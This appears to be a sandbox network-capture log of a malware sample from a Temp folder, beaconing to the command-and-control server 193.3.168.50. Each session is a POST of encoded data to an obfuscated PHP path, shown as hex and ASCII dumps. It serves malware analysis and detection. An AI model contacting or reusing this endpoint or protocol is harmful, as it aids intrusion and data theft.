                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.449763193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:42.855597973 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:43.205878973 CET1056OUTData Raw: 5f 5f 5f 52 5c 5a 5a 54 5a 58 51 52 55 57 5a 5d 50 53 5d 52 59 5a 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ___R\ZZTZXQRUWZ]PS]RYZWD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,<_<7%8?![ :0 0?$4!:'."8S>#G $],=
                                                                                                                  Dec 5, 2024 10:53:44.100519896 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:44.337546110 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.449764193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:44.580044985 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:44.924592018 CET1060OUTData Raw: 5f 5d 5a 5c 5c 5d 5f 57 5a 58 51 52 55 5f 5a 5d 50 56 5d 5d 59 5d 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _]Z\\]_WZXQRU_Z]PV]]Y]WD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._85\<:$]75>/27$T. $<$#!"0-<D!#7>#G $],
                                                                                                                  Dec 5, 2024 10:53:45.814090014 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:46.049483061 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:45 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.449765193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:46.295015097 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:46.643309116 CET1060OUTData Raw: 5f 50 5a 5e 59 59 5a 50 5a 58 51 52 55 52 5a 5f 50 55 5d 5f 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _PZ^YYZPZXQRURZ_PU]_YRWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-, 9X<: \!&=,<-\7:$.%<$T#"-0=06 <(-#G $],1


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.449766193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:47.124984980 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:47.471735954 CET1936OUTData Raw: 5f 5c 5f 5e 5c 5e 5f 57 5a 58 51 52 55 56 5a 58 50 55 5d 5a 59 59 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_^\^_WZXQRUVZXPU]ZYYWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.,9_=* #%%/- )#.U?0?87T=%. D"0T*#G $],!
                                                                                                                  Dec 5, 2024 10:53:48.371664047 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:48.605647087 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 03 24 2b 27 0d 33 02 01 15 28 0d 23 07 2e 0d 37 5a 27 2e 08 1b 26 14 24 0b 2a 14 24 05 22 5b 32 5c 3f 39 3b 52 3f 19 06 53 3d 28 20 58 00 1a 25 01 20 22 0d 03 2d 07 30 1e 31 3e 22 5e 30 13 04 03 29 07 2c 0a 3d 30 20 55 32 00 3e 53 2b 23 39 53 38 1a 26 00 2f 3e 26 59 26 15 2a 52 0e 17 21 15 2a 10 20 12 22 31 21 13 28 31 0d 1b 28 3f 01 52 33 06 2e 53 23 2d 3e 0b 27 56 3e 0b 33 1c 0c 53 30 28 23 12 31 01 2c 5c 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&$+'3(#.7Z'.&$*$"[2\?9;R?S=( X% "-01>"^0),=0 U2>S+#9S8&/>&Y&*R!* "1!(1(?R3.S#->'V>3S0(#1,\* _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.449767193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:47.246284008 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:47.596373081 CET1056OUTData Raw: 5f 50 5f 5b 59 59 5a 5f 5a 58 51 52 55 57 5a 5e 50 53 5d 52 59 59 57 44 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _P_[YYZ_ZXQRUWZ^PS]RYYWD^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,=_<*446)/49$W-0+Y3#"0!4>#G $],1
                                                                                                                  Dec 5, 2024 10:53:48.483824968 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:48.717506886 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:48 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.449768193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:48.965683937 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:49.315287113 CET1060OUTData Raw: 5f 51 5a 59 59 5f 5a 5e 5a 58 51 52 55 55 5a 5c 50 56 5d 58 59 58 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _QZYY_Z^ZXQRUUZ\PV]XYXWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.;3%<*'#=,1\!9R-?%<3 6'C! (-#G $],-
                                                                                                                  Dec 5, 2024 10:53:50.204859972 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:50.437592983 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.449769193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:50.686804056 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:51.033956051 CET1060OUTData Raw: 5a 5e 5f 5a 59 5b 5a 55 5a 58 51 52 55 51 5a 5c 50 56 5d 5a 59 52 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z^_ZY[ZUZXQRUQZ\PV]ZYRWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^- Y<Z4&68<=\ (T.#'Z$<0R !Z360#)#G $],=
                                                                                                                  Dec 5, 2024 10:53:51.924709082 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:52.157598019 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.449770193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:52.403414965 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:52.752778053 CET1060OUTData Raw: 5f 5c 5f 5a 59 56 5a 57 5a 58 51 52 55 55 5a 5d 50 51 5d 5e 59 5e 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_ZYVZWZXQRUUZ]PQ]^Y^WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X/35=9+ 6),* ) .<',7&'$B6 '*#G $],-
                                                                                                                  Dec 5, 2024 10:53:53.640650034 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.449771193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:53.733421087 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1924
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:54.080806971 CET1924OUTData Raw: 5f 5c 5f 52 59 5e 5f 53 5a 58 51 52 55 57 5a 5a 50 55 5d 53 59 5e 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_RY^_SZXQRUWZZPU]SY^WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.80!^<Z#"Z/&#$V:70S#['>86 =#G $],!
                                                                                                                  Dec 5, 2024 10:53:54.971354961 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:55.205805063 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 5a 24 2b 02 53 27 2f 27 1a 2b 33 33 00 2e 23 23 59 30 2e 07 45 25 2a 09 56 2a 03 23 1f 20 3e 39 03 3c 39 24 0b 3f 0e 2b 0f 29 38 20 58 00 1a 26 1a 21 32 38 13 2e 07 01 05 26 03 29 06 24 13 26 04 29 39 33 15 2a 0a 37 0c 25 58 22 14 29 0d 00 0d 3b 1a 2a 04 3a 2d 3d 07 31 3f 2a 52 0e 17 21 56 28 2d 20 5a 20 22 35 50 3e 32 24 04 29 3f 2c 0f 30 01 25 09 34 07 3d 55 24 33 3d 10 24 31 22 55 30 38 3b 1d 26 11 30 59 3d 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%Z$+S'/'+33.##Y0.E%*V*# >9<9$?+)8 X&!28.&)$&)93*7%X");*:-=1?*R!V(- Z "5P>2$)?,0%4=U$3=$1"U08;&0Y= _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.449772193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:53.854407072 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:54.227942944 CET1060OUTData Raw: 5f 5c 5f 5e 59 57 5a 5f 5a 58 51 52 55 55 5a 58 50 5e 5d 5f 59 5e 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_^YWZ_ZXQRUUZXP^]_Y^WF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ !\(9'#6=,?- ;-U(%,8R#19'.+"08V*=#G $],-
                                                                                                                  Dec 5, 2024 10:53:55.099199057 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:55.337575912 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.449774193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:55.577171087 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:53:55.924618959 CET1060OUTData Raw: 5a 5c 5f 5c 59 5a 5a 56 5a 58 51 52 55 52 5a 52 50 56 5d 52 59 5d 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z\_\YZZVZXQRURZRPV]RY]WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ =9 658<2#)(S93;0342![0>+"(V==#G $],1
                                                                                                                  Dec 5, 2024 10:53:56.814743996 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:57.049464941 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.449776193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:53:57.295377970 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:53:57.643596888 CET1060OUTData Raw: 5f 50 5f 58 59 5b 5a 56 5a 58 51 52 55 56 5a 53 50 56 5d 5d 59 5e 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _P_XY[ZVZXQRUVZSPV]]Y^WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/V%\(9<X %&\8.#)-##\%,/4'(#0>#G $],!
                                                                                                                  Dec 5, 2024 10:53:58.534506083 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:53:58.769474983 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:53:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
